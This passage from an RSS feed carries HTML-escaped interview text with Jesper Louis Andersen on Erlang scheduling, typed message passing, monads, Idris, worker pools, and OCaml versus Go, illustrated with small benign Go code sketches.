&lt;p&gt;A far better approach is seen in Quasar&#x2F;Pulsar: take existing bytecode and rewrite it by instrumentation, much like in Erlang. You can insert forced preemptions into loops, and protect any potentially blocking call by a lightweight fiber switch. If you add your own I&#x2F;O manager underneath, you almost have a full implementation of the Erlang model. But it takes a serious amount of work to get the lower parts to run fast in this model, since you have to reimplement all of the Erlang VM inside Java.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;In practical terms, what do you gain from using a VM like the Erlang VM that has a preemptive scheduler?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Preemption is an exchange in which you sacrifice explicit control for gains in productivity. First, you don’t have to adapt existing code to your model, which saves time. In languages without proper abstraction barriers, calling the wrong function at the wrong time can block a scheduler. Second, in a post-DevOps world where you run your own systems, productivity is directly tied to the maintenance overhead of existing systems. The lower fragility of the model means you have more time to actually write new code rather than fix old problems. You can afford to let bad behavior live for longer in the system since its impact simply gracefully degrades the system a bit.&lt;&#x2F;p&gt;
&lt;p&gt;Most importantly however, you don’t have to worry about every nook and cranny of the code. Rarely run code can be written in a slightly less performance-oriented way, since its cost is automatically amortized over the whole of the program by the scheduler. And even in the critical paths, the smearing operation of the scheduler helps a lot to alleviate spikes. Long-running background jobs can simply be started without much worry.&lt;&#x2F;p&gt;
&lt;p&gt;Another gain is had from the observation “N starts out small and then grows”, which is to say that over time, a piece of software gets to handle gradually more and more data. Without a preemptive scheduler, this growth very often ends up having a considerable latency or throughput impact. Erlang systems err on the side of maintaining low latency for slightly worse throughput in these situations. As load increases on a system, this is often the desirable behavior, as it is less likely to affect other systems directly. The system simply degrades gracefully rather than abruptly.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;You wrote:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;In Haskell, Type Classes are often the abstraction way to go. In ML, the key is to use modules.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Don’t you miss type classes or ML modules in Erlang?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I do miss them a lot, but they both rely on efficient type worlds in order to function. Adding them to an untyped language like Erlang is going to be rather hard. A far more reasonable way to go for Erlang programs is to look to the Elixir and Clojure communities. Clojure’s “protocols” would be a good addition I think, and it fits the Erlang design space far more. Another good place for inspiration is Scheme48’s implementation of modules, which took inspiration from Standard ML’s functors among other things. Scheme48 being an R5RS (&lt;em&gt;Revised^5 Report on the Algorithmic Language Scheme&lt;&#x2F;em&gt;) implementation also shares lots of its design space with Erlang.&lt;&#x2F;p&gt;
&lt;p&gt;It is often said a Haskell type class construction can be implemented with an ML module. The correspondence in Erlang would be to use a process. Processes force code to modularize and isolate, since communication can only be done through the exchange of messages. Granted, it happens at runtime, but used correctly it yields emergent behaviors in the source code: the same module is executed by many isolated processes at runtime, and their interaction defines the behavior of the program. The literature on swarm intelligence provides more information in this area.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Is it possible to implement a rich static type system and also have message passing at the same time?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Yes it is! Most such systems introduce some kind of “box” which can be typed as in a “box containing type X”. The box is often a single-message mailbox, or a channel. The type system doesn’t even need to be rich for this to work out, as Go shows. It works because the box carries a type with it, so when you put things into the box or extract things from the box, you can statically reason about the type of the extracted&#x2F;inserted value.&lt;&#x2F;p&gt;
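&lt;p&gt;Go’s typed channels are the simplest instance of such a box; a minimal sketch of the idea:&lt;&#x2F;p&gt;

```go
package main

import "fmt"

func main() {
	// A buffered channel is a typed "box": the compiler knows only
	// ints go in, so both insertion and extraction are checked
	// statically at each end.
	box := make(chan int, 1)

	box <- 42 // box <- "hello" would be a compile-time error
	v := <-box

	fmt.Println(v + 1) // v is statically known to be an int
}
```

&lt;p&gt;No richness is required of the type system here: the static guarantee comes entirely from the channel threading its element type between the two endpoints.&lt;&#x2F;p&gt;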
&lt;p&gt;Haskell has several highly interesting communication models which enjoy rich typing. There is also John Reppy’s ConcurrentML, which takes communication a step further: not only are channels first-class values which can be manipulated, &lt;em&gt;events&lt;&#x2F;em&gt; are first class. CML has an algebra for manipulating events, and combining them. Once you call &lt;em&gt;sync&lt;&#x2F;em&gt; on the event, then the scenario plays out. It is akin to being able to have &lt;em&gt;receive&lt;&#x2F;em&gt;-clauses as values which you can join: &lt;em&gt;sync join(Recv1, Recv2)&lt;&#x2F;em&gt;. The most mind-altering operation in Reppy’s calculus is &lt;em&gt;withNack&lt;&#x2F;em&gt;, which is an event firing if &lt;em&gt;another&lt;&#x2F;em&gt; event is picked. It is often used for cancellation situations.&lt;&#x2F;p&gt;
&lt;p&gt;Most of these models assume a non-distributed setting though. They assume that communication cannot fail, and that code cannot be upgraded as it is running. CML’s event resolution in a distributed setting is likely to run into the CAP theorem, for instance. Most type systems assume total static knowledge&#x2F;control, something you rarely have in a distributed system. Hence you have to verify interactions between distributed agents, which somewhat defeats the holistic aspect of static typing.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What do you think about monads in Erlang? Are they useful? Have you tried out &lt;&#x2F;strong&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;rabbitmq&#x2F;erlando&quot;&gt;&lt;strong&gt;erlando&lt;&#x2F;strong&gt;&lt;&#x2F;a&gt;&lt;strong&gt;?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I do use a monad construction in Erlang from time to time, when the code is going to flow better with a monad, but I rarely use tools such as erlando when doing so. Those packages assume a monad is a module, whereas I often use a record for my monad work. To me, monads have always been a tool best used in special cases, and to understand formal logics. Personally, I much prefer the hybrid approaches of OCaml and Erlang, where the languages allow imperative code, to the approach of Haskell with purity above all. The latter “forces” monads upon you in ways I don’t always appreciate.&lt;&#x2F;p&gt;
&lt;p&gt;The monad story in Erlang is somewhat weaker than I would like it to be. In Haskell, it is nice because the compiler can use the types to implicitly infer what monad is to be used and then use that monad. A lot of the power comes from the ability to interweave the monadic bind into your code. A Haskell weakness is when you have monad transformer stacks where your code has to change whenever you reorder the stack, but perhaps the work on Freer monads by Kiselyov can amend this weakness. I feel the productivity is slightly lower in, e.g., OCaml (4.02), which needs explicit reference to the monad in order to use it. In Erlang, simple monads are easy to comprehend. But once you build a complex system out of abstractions, you really need a proper type system to guide you, which you don’t get in Erlang. In turn, Erlang code tends to be less abstraction-heavy.&lt;&#x2F;p&gt;
&lt;p&gt;I don’t necessarily think it is a bad idea to have code which uses relatively few abstractions. My own code style, even in OCaml and Haskell, tends to rely on simple principles rather than high levels of abstraction. If you introduce many abstractions, you are also introducing the need for readers to have that knowledge. It is possible to go overboard here, and end up with code which only a few people in the world can read and understand. It might be very efficient and very elegant, but you won’t get many programmers looking at the code. Hence, I tend to use a couple of abstractions when they really help the code, but I refrain from using them in most other situations, preferring to rewrite code through simpler means.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What do you think about Idris Erlang?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Sam Elliot wrote a thesis on this subject[0], and I take it that this is the work you are asking about. Among the contributions is a proof-of-concept Erlang backend for Idris. It allows you to take Idris modules and compile them as Erlang modules. A proper backend would definitely need more work, and it should target Core Erlang rather than concatenating strings together to form an Erlang program. Yet, one has to remember what the goals of a thesis are, which is to say it is not about producing production-quality backends for languages. But the thesis also explores another path which was perhaps a bit overlooked: how do we type message communication?&lt;&#x2F;p&gt;
&lt;p&gt;Looking at the Erlang message model, and squinting your eyes a lot, you get what is essentially IP&#x2F;UDP communication of messages, of arbitrary size. If you know a Process ID, you know its “IP” and you have a capability to send that PID a message. You also have the property that message loss might occur, but it is very unlikely unless something is going seriously wrong. Since the risk of failure is low, you can usually handle it by restarting from a known good state, rather than implementing complex recovery schemes.&lt;&#x2F;p&gt;
&lt;p&gt;This model is extremely flexible and you can build almost any kind of messaging on top of it. But on the other hand, generality weakens the meta-theoretic properties of any protocol: we can’t say anything about the well-formedness of messages.&lt;&#x2F;p&gt;
&lt;p&gt;What Elliot points out in his thesis is the notion of constraining our communication to certain limited patterns. By giving up the general messaging, we can suddenly define a typed world in which we understand what is going on. In turn, we can prove well-typed patterns enjoy desirable properties. With enough work, we may be able to capture essentially all the healthy patterns of communication, while rejecting the bad ones. If this could lead to the removal of subtle concurrency&#x2F;distribution mistakes, we will have come a long way.&lt;&#x2F;p&gt;
&lt;p&gt;Another thesis I have to mention in passing is Simon Fowler’s, on monitoring communication patterns in Erlang&#x2F;OTP[1]. Fowler explores the idea of monitoring messaging at runtime through an altered &lt;em&gt;gen_server&lt;&#x2F;em&gt; construct. One of his major observations is that many Erlang message patterns are not captured by a typical two-party session type, let alone a multi-party session type. In particular, multi-party session types don’t allow for the dynamic introduction of new members, nor for the termination of members while the session is ongoing. Fowler proposes several interesting solutions and paths in his thesis on how to adapt the system to handle these problems.&lt;&#x2F;p&gt;
&lt;p&gt;All in all, these observations seem to suggest we need some more research work in the area to understand the full interplay between a language such as Idris, and a highly concurrent ecosystem such as the Erlang BEAM VM. It would seem Erlang is a more generic fabric on top of which we could &lt;em&gt;patch in&lt;&#x2F;em&gt; restrictions which improve the quality of our systems through automatic fault removal. In any case, typing concurrent&#x2F;distributed programming in a very general communication model such as Erlang’s seems to be very hard.&lt;&#x2F;p&gt;
&lt;p&gt;We also need to explore messaging patterns in Erlang which are typeable in some type system. Usually such patterns have additional desirable structure embedded in them because the type system enforces rigidity. By researching in this area, one may hope to improve the understanding of why certain patterns are used, or not.&lt;&#x2F;p&gt;
&lt;p&gt;[0] &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;lenary.co.uk&#x2F;publications&#x2F;dissertation&#x2F;&quot;&gt;http:&#x2F;&#x2F;lenary.co.uk&#x2F;publications&#x2F;dissertation&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;[1] &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;simonjf.com&#x2F;writing&#x2F;msc-thesis.pdf&quot;&gt;http:&#x2F;&#x2F;simonjf.com&#x2F;writing&#x2F;msc-thesis.pdf&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Since it is very common to use a pool of gen_servers in Erlang: wouldn’t it be a good idea for Erlang&#x2F;OTP to have a default gen_pool implementation?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Erlang’s tenet is “provide tools, not solutions”. That is, provide the tooling for building a pool, but don’t provide a pool. The reason has to do with the fact that pools are not alike. Over the last 10 years I’ve come across perhaps 5 different pool implementations, and the key observation is they are all &lt;em&gt;valid&lt;&#x2F;em&gt; implementations. How to hand out resources from the pool differs: some do round-robin proxying. Some queue requests and hand them out in FIFO order. Some use LIFO order. Some are distributed Job-Idle Queue implementations, whereas some can only run on a single machine. Some provide automatic health checks and reconnections. Some block the caller when there is no work, others error, and some queue the caller for a while before erroring.&lt;&#x2F;p&gt;
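&lt;p&gt;To make the FIFO&#x2F;LIFO point concrete, here is a minimal sketch in Go (names hypothetical) of just the checkout step; real pools additionally differ in how they queue callers, do health checks, reconnect, and handle failure:&lt;&#x2F;p&gt;

```go
package main

import "fmt"

// pool hands out idle resources in either FIFO or LIFO order.
// This sketch covers only the hand-out policy; both orders are
// valid, which is exactly why no single default fits everyone.
type pool struct {
	idle []string
	lifo bool
}

// checkout removes and returns one idle resource, or ok=false when
// the pool is empty.
func (p *pool) checkout() (string, bool) {
	if len(p.idle) == 0 {
		return "", false
	}
	var r string
	if p.lifo {
		r = p.idle[len(p.idle)-1] // most recently idle resource first
		p.idle = p.idle[:len(p.idle)-1]
	} else {
		r = p.idle[0] // oldest idle resource first
		p.idle = p.idle[1:]
	}
	return r, true
}

func main() {
	fifo := &pool{idle: []string{"c1", "c2", "c3"}}
	lifo := &pool{idle: []string{"c1", "c2", "c3"}, lifo: true}
	a, _ := fifo.checkout()
	b, _ := lifo.checkout()
	fmt.Println(a, b)
}
```

&lt;p&gt;FIFO spreads load evenly over the idle resources, while LIFO keeps a hot subset warm (useful when idle connections go stale); which is “correct” depends entirely on the context in which the pool is used.&lt;&#x2F;p&gt;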
&lt;p&gt;The other observation is how such pools handle failure, reclaim stale resources, handle errors in the pool implementation itself etc. Again, it is not clear what &lt;em&gt;the&lt;&#x2F;em&gt; implementation should be, and what would be the correct operation. It is mostly a function of context in which the pool is used.&lt;&#x2F;p&gt;
&lt;p&gt;My experience is that this problem space requires either chaos monkeys, Concuerror, or QuickCheck+PULSE to remove faults, and it is hard to get entirely right. But such tools require a specification of “correct operation”, and there are several such specifications.&lt;&#x2F;p&gt;
&lt;p&gt;Had Erlang&#x2F;OTP provided a default gen_pool implementation, then people would use it even if it doesn’t fit their problem space. This tends to create subtle, hard-to-find faults.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>Interview with Jesper Louis Andersen about Erlang, Haskell, OCaml, Go, Idris, the JVM, software and…</title>
          <pubDate>Mon, 28 Dec 2015 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and/">&lt;h3 id=&quot;interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and-protocol-design-part-i&quot;&gt;Interview with Jesper Louis Andersen about Erlang, Haskell, OCaml, Go, Idris, the JVM, software and protocol design — PART I&lt;&#x2F;h3&gt;
&lt;p&gt;On this occasion we interviewed Jesper Louis Andersen, a type theorist with a lot of practical knowledge and experience. His &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;@jlouis666&quot;&gt;blog&lt;&#x2F;a&gt; (you should also check his old &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;http:&#x2F;&#x2F;jlouisramblings.blogspot.com&#x2F;&quot;&gt;blog&lt;&#x2F;a&gt;, you will find a lot of good things over there) and code (especially things like &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;jlouis&#x2F;safetyvalve&quot;&gt;safetyvalve&lt;&#x2F;a&gt; and &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;jlouis&#x2F;fuse&quot;&gt;fuse&lt;&#x2F;a&gt;) have been a big inspiration to me. That is why I published the interview in two parts: I had too many questions for him. I hope you enjoy reading his answers as much as I did.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;1-mIrYVuSZtaYe3WJkRwUqwQ.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I published part II of the interview. &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;this-is-not-a-monad-tutorial&#x2F;interview-with-jesper-louis-andersen-about-erlang-haskell-ocaml-go-idris-the-jvm-software-and-5628fe591295&quot;&gt;Check it out!&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;hr &#x2F;&gt;
&lt;p&gt;&lt;strong&gt;Your reply to the picture that is below was:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;The typical applications I write in Erlang have 3–4 functions above it in the call stack&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Modern comfortable programming language #java:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;max&#x2F;2000&#x2F;0-Ee-kDajNT561ZgOd.jpeg&quot; alt=&quot;&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Why is it so? Why is this not the case in most OOP languages?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;It is not really an artifact of OOP-style languages as much as it is an artifact of how we develop software. In biology, it has been observed that solutions usually come not from rewriting code, but from patching it. Imagine a world where we are more inclined to build on top of what we already have rather than go down and rewrite older parts. I think each new generation of programmers tends to add a layer on top of what we already have, mostly to put their mark on programming and to simplify and abstract the parts of the lower levels which are in common use while also hiding the rare parts. What you get is the deep call stack. Another similar view would be in geology, where you can see older layers and go back in time to older periods. Much of the Java stack has this in it.&lt;&#x2F;p&gt;
&lt;p&gt;Erlang is no different, but from the outset, small-community languages are less susceptible to patching. Especially if it is easy to rewrite code, which means an itch can be scratched by writing something new, rather than building on top of what others did. What brings the call stack down to 3–4 frames, however, are processes. In an Erlang system a typical web request is served by the cooperation of 3–4 processes, each of those having a call stack. Add them all together, and you approach the above size, but in isolation, they are small. Any error will result in a crash report with 3 things in it: the backtrace, the state &lt;em&gt;before&lt;&#x2F;em&gt; the process crashed and the incoming message which made it crash. The reason we have the original state is because of functional programming: every data structure is persistent, so we can version it. Usually this is enough to quickly isolate and figure out where the error is and what went wrong.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;You tweeted:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;“Lets talk agile: The ultimate agile language is one in which you can deliver working code quickly, which is also maintainable. Hence there are only a few agile languages in existence: Haskell, Ocaml and Erlang are 3. Go, Javascript, Python and the rest lacks the necessary abstractions to be regarded as agile. You end up having to recode. However, the &lt;strong&gt;real&lt;&#x2F;strong&gt; solution is to stop doing agile. The idea is bullshit in the first place.”&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Why Haskell, OCaml and Erlang are the only agile languages?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;If the waterfall model risks not building the right product, then agile risks not building the product right. I’m very fond of Erlang creator Mike Williams’ point: “If you don’t make experiments before starting a project, then your whole project will be an experiment”. My hunch is that what a lot of agile processes miss is that you need to experiment before you build.&lt;&#x2F;p&gt;
&lt;p&gt;If we instead ask about prototyping, then we need a programming language with certain traits. The team is usually small, so we need an expressive language, and we need to address the core kernel of the system in isolation, first. We don’t need a lot of interfacing to foreign systems and in general we won’t care too much if the system we build is fast. Also, we usually won’t need to operate the prototype in production, since it is simply a proof of concept.&lt;&#x2F;p&gt;
&lt;p&gt;From a perspective of rapid prototyping and proof-of-concept development, functional languages tend to have an edge over imperative ones. Their higher level and expressivity allows more to be said succinctly, in fewer lines of code. They also tend to describe data structures and algorithms in ways that are clearer, which helps understanding of the problem space.&lt;&#x2F;p&gt;
&lt;p&gt;In turn, since agile values the minimum viable product, moving fast and making experiments, you need languages in which it is easy to experiment with the unknown ideas many agile projects face. In languages such as Haskell, Erlang and OCaml you can often iterate over far more designs in a limited time window. Thus you can carry out more experiments, and this often leads to a better product, even if the final product is not even written in a functional language. In general I feel we value experimentation too little. Build it, throw it away, and rewrite with the new knowledge.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What do you think about Clojure?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Sadly, my experience with Clojure is limited to carrying out a set of koans in the language, and I have never used it for any serious work. I must admit I don’t find the language especially compelling, and in general I don’t find Lisp dialects interesting. My language roots are closer to Standard ML, which may be the reason it did not catch my interest when I finally tried toying with Scheme and Common Lisp.&lt;&#x2F;p&gt;
&lt;p&gt;That said, people are doing lots of outright &lt;em&gt;amazing&lt;&#x2F;em&gt; stuff in Clojure. I think the Datomic project is genuinely interesting as a database system. And the work Kyle Kingsbury has done with his “Jepsen” framework and his “Knossos” linearizability checker in Clojure is solid work. I’m also following David Nolen’s work with interest. But I’m pretty sure the language isn’t “for me”.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;You tweeted:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;Functional programming semantics are far more important than static typing for removing errors from programs.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Why? Could you elaborate?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I’ve somewhat alluded to this before, but never in more than 140 characters. In an imperative program a function depends on two things: the parameters it is passed and also the current state of the machine store. In a functional language, only the former matters. The consequence of this choice is far-reaching:&lt;&#x2F;p&gt;
&lt;p&gt;One, the state space we have to reason about as human beings is far smaller for FP, which makes it harder to make a programming mistake. Two, we can test functions in isolation and be rather confident we have covered the function’s execution well. Three, data processing is inductive in nature, recursing over the &lt;em&gt;structure&lt;&#x2F;em&gt; of data rather than manipulating the store from afar. The programming is closer to a proof by induction, which forces the programmer to handle corner cases rigorously.&lt;&#x2F;p&gt;
&lt;p&gt;The ease of reasoning also comes into play once you have found a bug. It is often easier to figure out what the program is doing wrong just by taking a close look. It is rare that you need to attach a debugger, which you can’t do in a concurrent and&#x2F;or distributed system where some parts are outside of your direct control.&lt;&#x2F;p&gt;
&lt;p&gt;When you add typing to the above, you obtain another dimension where your system is (automatically) checked for additional rigor. But I often find people forget how much power there is to be had just by functional programming on its own, with no regard to types. From my own experience, functional programs tend to have an order of magnitude fewer errors than imperative counterpart programs, especially when these are subtle corner-case errors, types or not. Naturally, types + functional programming help even more. But had I the choice between imperative programming with types or functional without, I know what I’d pick without hesitation.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;What is your opinion regarding dependent types like the one Idris has?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;I have not studied Idris very much yet, but I did some work in Agda and Coq, which both employ dependent types, although the type theories differ subtly between all of them. I’ve deliberately been pushing it ahead of me for a while, like I also have done with Rust. Mostly because I’d like them to settle down and mature a bit more before I start looking into them. I’d probably start looking around 2017 on both. From a research perspective, Idris is extremely important. We need to explore this area more for real-world programs as well, and having a language designed for programs rather than proof assistance is fairly important. Of course, one would like to see a more mature language, but one has to understand how much is being sunk into Idris to make this happen currently.&lt;&#x2F;p&gt;
&lt;p&gt;I’m not yet entirely convinced we necessarily want to add dependent types to mainstream languages in its full form. Perhaps it turns out we’d rather want a simpler type system in some areas in order to extend it along other dimensions. I’m somewhat interested in the Curry-Howard correspondence between distributed programming and epistemic logic for instance. And it is not a priori clear we even understand what it means to marry dependent types to such a beast. We may have to cut the cake differently in order to understand the type-level interactions.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;Don’t you think that OCaml and Go compete for the same space? What has been your experience with the two languages and how do you think they compare?&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;If you squint your eyes hard enough, OCaml is an imperative language on top of which you add a lambda calculus. Or it is a lambda calculus with primitive operations for imperative execution. Either way, Go and OCaml are very much alike at the core: both are garbage-collected, natively compiled languages, and they tend to provide execution speed in the same ballpark, usually within the same order of magnitude.&lt;&#x2F;p&gt;
&lt;p&gt;What sets the two languages apart is the underlying ideology of how to design a programming language. Go is a modest cleanup of the C semantics on top of which you add channels, goroutines and interfaces. OCaml is a programming language in the tradition of Milner’s Meta-Language (ML), drawing inspiration from Haskell and Standard ML, among others.&lt;&#x2F;p&gt;
&lt;p&gt;Go usually opts for simplicity and separation of features into a small basis. The language specifically addresses the concerns of programming in the large. This yields programs which are highly coherent, because the programmer has relatively few abstraction tools at their disposal. In addition, the interface concept in Go is implicit, which means you have less need to alter other parts of the system. In a large setting with hundreds of programmers, altering code someone else “owns” is usually measured in days, whereas local alterations take hours. So the time lost to lower abstraction can be deceiving.&lt;&#x2F;p&gt;
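&lt;p&gt;A minimal sketch of what implicit interface satisfaction looks like in Go (the &lt;code&gt;Describer&lt;&#x2F;code&gt; interface and &lt;code&gt;Server&lt;&#x2F;code&gt; type here are made up for illustration):&lt;&#x2F;p&gt;

```go
package main

import "fmt"

// Describer is satisfied implicitly: any type with a matching
// Describe() method implements it, with no "implements" clause.
type Describer interface {
	Describe() string
}

type Server struct{ Host string }

// Adding this method is a purely local change; Server now satisfies
// Describer without touching the code that defines the interface.
func (s Server) Describe() string { return "server at " + s.Host }

func main() {
	var d Describer = Server{Host: "example.com"}
	fmt.Println(d.Describe())
}
```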
&lt;p&gt;The simple, coherent design of Go also fosters fast compilation with little to no abstraction overhead. It doesn’t matter what abstractions you use: your program will usually compile fast, and it will be pretty obvious what the performance behavior of the program is. Fast compilation speed matters in large settings because waiting on the compiler is often wasted time.[*]&lt;&#x2F;p&gt;
&lt;p&gt;Russ Cox noted that some abstractions, generics for instance, make a trade-off between putting the onus on the programmer, the compiler, or the execution speed. Leave out generics and the programmer has to work around it. Add generics, and the compiler has to do more work in the compilation phase. Or abstract away generics by a boxing construction, which affects execution speed. Go opts for the first of these.&lt;&#x2F;p&gt;
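&lt;p&gt;A hypothetical illustration of that trade-off in Go as it was at the time (before generics landed): either duplicate a function per type, or box values and pay at runtime. Both functions below are invented for this sketch:&lt;&#x2F;p&gt;

```go
package main

import "fmt"

// Option 1: the onus is on the programmer, who duplicates
// the function for each element type it must support.
func SumInts(xs []int) int {
	t := 0
	for _, x := range xs {
		t += x
	}
	return t
}

// Option 2: box values as interface{} and pay for a runtime
// type assertion on every element instead.
func SumBoxed(xs []interface{}) int {
	t := 0
	for _, x := range xs {
		t += x.(int) // runtime type assertion
	}
	return t
}

func main() {
	fmt.Println(SumInts([]int{1, 2, 3}))
	fmt.Println(SumBoxed([]interface{}{1, 2, 3}))
}
```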
&lt;p&gt;OCaml contrasts heavily. From an abstraction perspective, it leaves Go in the dust and supports far more efficient use of the programmer’s time. The compiler is also relatively fast and handles the added abstraction well, though at present there is an overhead to abstraction use. In Cox’s terms, the current version of OCaml (4.02) sacrifices execution speed in some cases. The new Flambda IR in OCaml 4.03 shifts this onus around and puts more into the compiler[0].&lt;&#x2F;p&gt;
&lt;p&gt;Another important dividing factor is the current lack of proper multicore support in OCaml, which also means the lack of a proper concurrency runtime built in by default. In OCaml, you have to rely on a system such as Lwt or Async to achieve what goroutines do in Go. And the fact that there are two means everyone has to support both in their libraries. The situation is far from perfect.&lt;&#x2F;p&gt;
&lt;p&gt;I usually grab OCaml for problems which have certain traits. Symbolic manipulation is one thing at which OCaml excels because it has proper algebraic datatypes. Thus, I would never write a compiler or proof assistant in anything else. Programs generating programs are another area in which OCaml excels. Finally, problems which have an embarrassingly parallel structure can easily be handled by just spawning more OS processes in OCaml, and the code generator of OCaml is quite efficient.&lt;&#x2F;p&gt;
&lt;p&gt;I usually write Go for simple brute-force programs where the interactions are not very complex and there is a simple channel network inside the program. I avoid it for anything with complex interactions, because the simplicity of the language often gets in the way. But some problems have the virtue of being simple by construction, which makes Go a really good language for them.&lt;&#x2F;p&gt;
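&lt;p&gt;A sketch of the kind of simple channel network meant here (the stage names are invented for illustration): a generator goroutine feeds a transforming goroutine, and the results are collected at the end.&lt;&#x2F;p&gt;

```go
package main

import "fmt"

// generate emits the integers 1..n on a channel and closes it.
func generate(n int) <-chan int {
	out := make(chan int)
	go func() {
		for i := 1; i <= n; i++ {
			out <- i
		}
		close(out)
	}()
	return out
}

// square reads values from in, squares them, and forwards them.
func square(in <-chan int) <-chan int {
	out := make(chan int)
	go func() {
		for v := range in {
			out <- v * v
		}
		close(out)
	}()
	return out
}

func main() {
	sum := 0
	for v := range square(generate(4)) {
		sum += v
	}
	fmt.Println(sum) // 1 + 4 + 9 + 16 = 30
}
```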
&lt;p&gt;Personally, I prefer the OCaml ideology. Add abstractions to the language, build a powerful module system, with functors, in which you can program in the large by β-reducing modules into one another. And use the compiler and computer as a sacrifice to pay for this additional abstraction. Those programs are easier to maintain, and easier to recombine.&lt;&#x2F;p&gt;
&lt;p&gt;Go and OCaml are best used for programs where some part is heavily CPU-bound and you are not memory-bound. The vast majority of the programs I write have little to no need to run on a tight CPU schedule, and there I usually just write them in Erlang. If you are bound by memory, you often end up in situations where the gain from dropping to OCaml or Go is small. And if you are bound by outside interaction, disk or network, there is almost no gain.&lt;&#x2F;p&gt;
&lt;p&gt;[*] Fast compilation and linking speed are two major reasons I like Erlang too.&lt;&#x2F;p&gt;
&lt;p&gt;[0] A worthwhile aside: The MLton Standard ML compiler takes this to an extreme by compiling &lt;em&gt;all&lt;&#x2F;em&gt; of the program in one fell swoop. Thus, it is able to perform whole-program analysis and optimization with perfect knowledge of the program. This makes a lot of the abstractions free, but the price is long compilation times.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;In a great post where you explained the drawbacks of JSON and REST HTTP APIs you also wrote:&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;blockquote&gt;
&lt;p&gt;“We need to go back to our roots and start building protocols again. This change will never come from a large company. It has to rely on an open tinkerer culture. We need well-defined protocols and multiple implementations of these. Protocol design is quickly becoming a lost art. Rather, people are satiated with “APIs” to the point where they can’t recover.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;We need de-centralization. The internet is built on the idea of end-to-end interaction between machines. The current state is more of a client&#x2F;server infrastructure in which few central entities drive the status quo.&lt;&#x2F;p&gt;
&lt;&#x2F;blockquote&gt;
&lt;blockquote&gt;
